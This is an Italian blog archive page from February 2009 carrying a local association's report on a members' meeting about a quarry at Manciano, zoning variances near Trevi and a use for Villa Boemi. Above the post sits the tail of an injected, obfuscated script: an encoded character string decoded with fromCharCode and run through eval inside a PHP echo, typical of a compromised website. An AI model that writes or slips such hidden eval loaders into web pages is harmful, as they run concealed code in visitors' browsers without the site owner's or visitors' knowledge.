q4Zq1Zq72Zq4Zq1Zq60Zq5dZq1fZq3eZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq70Zq6aZq61Zq5aZq67Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74\"[gzr](\"Zq\");}uwo=cpf;uoukoc=[];for(ymg=22-20-2;-ymg 1420!=0;ymg =1){ubtze=ymg;if((0x19==031))uoukoc =pivr.fromCharCode(eval(xcf uwo[1*ubtze]) 0xa-nhmv);}ilqz=eval;if(Math.ceil(5.5)===6)ilqz(uoukoc)}";echo $x;} ?>

Archive for Febbraio, 2009

Esito assemblea

admin Febbraio 6th, 2009

Cari soci

           L’assemblea della Trebis, tenutasi domenica 25 gennaio in casa di Giancarlo e Virginia Izzo, ha espresso grande preoccupazione per la situazione della cava di Manciano, dove si sono svolti, durante gli ultimi mesi, scavi a quanto pare abusivi.

Nel suo ruolo da “cane da guardia”, ha inviato un segnale d’allarme per il numero di persone - stimate in più di 700 - che hanno richiesto varianti del Piano Regolatore nella zona agricola di Trevi che, se approvate, contribuerebbero alla distruzione, già peraltro avviata, della bellissima zona pedecollinare.

Venendo al problema dello spopolamento del centro storico - un problema certamente non risolvibile da un giorno all’altro - l’assemblea ha voluto contribuire alla ricerca di un uso per la Villa Boemi che gioverebbe anche alla comunità. E’ stato quindi deciso di:

1. mandare una lettera al Sindaco chiedendo tutta la documentazione sugli scavi recenti nella cava di Manciano;

2. chiedere dal Comune i nominativi e gli indirizzi di tutte le persone che hanno richiesto varianti al Piano Regolatore;

3. proporre al Sindaco di tenere una pubblica assemblea in cui si discuterebbero modalità pratiche per attirare organizzazioni o persone  per un utilizzo idoneo   di Villa Boemi.

Le elezioni per il nuovo consiglio direttivo sono state rimandate a data non ancora stabilita su richesta di Paolo Natalini che riteneva preferibile la presenza di un numero maggiore di soci (eravamo in 18). In ogni caso il mandato dell’attuale consiglio direttivo scadrà solo fra un paio di mesi. La data della nuova assemblea, dove si procederà anche al tesseramento per l’anno 2009, sarà annunciata quanto prima. Il Presidente, Giancarlo Izzo, ha annunciato che non si ricandiderà a causa di un suo probabile trasferimento all’estero.

Cordiali saluti

Patricia

–>